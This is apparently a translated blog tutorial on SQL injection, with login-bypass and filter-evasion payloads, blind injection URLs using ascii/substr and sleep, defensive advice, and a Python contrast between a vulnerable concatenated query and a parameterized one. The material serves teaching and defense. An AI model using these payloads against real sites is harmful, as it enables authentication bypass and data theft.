[WEB Vulnerability SQL Injection] Filter bypass + Blind SQL Injection
SQL INJECTION
[Definition]
SQL injection (also called SQL insertion) is a code injection technique in which the client's input values are manipulated to attack the server's database. It mostly occurs when data entered by the user is not properly filtered or escaped. Because the attack is easy yet its destructive power is enormous, it is the first thing a developer learning secure coding is taught. Injection-class vulnerabilities are hard to discover through testing, but they are usually found easily by scanning tools or code review procedures, so they are relatively easy to detect.
reference : Namuwiki
[Types]
- sql injection
- blind sql injection
- union injection ; used together with blind sql injection
[Examples]
# General sql injection
- Use the query's characteristics to make the condition evaluate to true.
Normal sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";
Manipulated sql query : SELECT * from tables where id="admin" and password="" or "1=1";
ID | admin |
PW | " or "1=1 |
[Filter bypass examples]
# When whitespace is filtered
- %0a, /**/, %09, () (a space is %20 in a URL)
Normal sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";
Manipulated sql query : SELECT * from tables where id="admin" and password=""%0aor%0a"1=1";
ID | admin |
PW | "%0aor%0a"1=1 |
# When =, and, or are filtered
- Replace them with like, &&, || respectively
Normal sql query : SELECT * from tables where id="$POST[id]" and password="$POST[password]";
Manipulated sql query : SELECT * from tables where id="admin" and password="" || "1 like 1";
ID | admin |
PW | " || "1 like 1 |
BLIND SQL INJECTION
[Definition]
An SQL injection where nothing is visible (blind). When error-based SQL injection has been blocked, all DB information is blinded, so the only thing that can be obtained from the server by submitting a query is true or false. An attack technique that uses this true/false result to work out information inside the DB.
[Examples]
# When you want to know the number of columns
sql query : select * from news where no=1 order by 1;
URL | http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1 |
# When you want to know the table name
- Use ASCII codes to work it out one character at a time from the true/false result.
sql query : select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67;
URL | http://100.100.100.129/view.php?no=1 union select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67; |
# When the true/false result cannot be seen
- Use and together with the sleep function; if the function runs (the response is delayed), the query is taken to have executed.
sql query : select * from news where no=1 order by 1;
URL | http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1 and sleep(10) |
SQL INJECTION defense methods
- Filter all characters and words that are used in sql queries.
- Take special care that error messages, and in particular query text, are never shown.
- Operate the DB with a least-privilege user.
- Allow access only from trusted networks and servers.
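The first defense item above (filtering) is exactly what the bypass examples defeat, so as an added example that is not part of the original post, here is a login check built two ways in Python with SQLite: string concatenation behind a space-stripping blacklist, which the page's %0a newline payload walks straight past, and a parameterized query, which compares the same payload as plain data. The users table, the s3cret password and the naive_filter helper are constructed for this example; the payload is written with single quotes and '1'='1' so that it runs on SQLite.

```python
import sqlite3

# Constructed sample table for this example (not from the original post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn

# The kind of blacklist the page's first bypass defeats: it strips spaces only,
# so %0a (newline) and %09 (tab) still separate SQL tokens after URL decoding.
def naive_filter(value):
    return value.replace(" ", "")

# Vulnerable: filtered input is pasted into the SQL text, so anything the
# filter misses is parsed as SQL.
def login_concat(conn, user_id, password):
    sql = "SELECT * FROM users WHERE id='%s' AND password='%s'" % (
        naive_filter(user_id), naive_filter(password))
    return conn.execute(sql).fetchall()

# Hardened: the driver binds the values separately from the statement, so the
# same payload is compared as a literal string and never parsed as SQL.
def login_param(conn, user_id, password):
    sql = "SELECT * FROM users WHERE id=? AND password=?"
    return conn.execute(sql, (user_id, password)).fetchall()

# The page's whitespace-bypass payload ("%0aor%0a") after URL decoding,
# adapted to single quotes and '1'='1' for SQLite.
BYPASS_PW = "'\nor\n'1'='1"

def demo():
    conn = make_db()
    return {
        "concat": login_concat(conn, "admin", BYPASS_PW),  # [('admin', 's3cret')]
        "param": login_param(conn, "admin", BYPASS_PW),    # []
    }

if __name__ == "__main__":
    print(demo())
```

The concatenated version returns the admin row without the password because the newline-separated `or '1'='1'` becomes part of the WHERE clause; the bound version returns nothing, and only the real password logs in.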
※ Applying or abusing this on ordinary sites, other than the sites that provide a practice environment, is absolutely forbidden!
※ I take absolutely no responsibility for damage caused by indiscriminate application or abuse.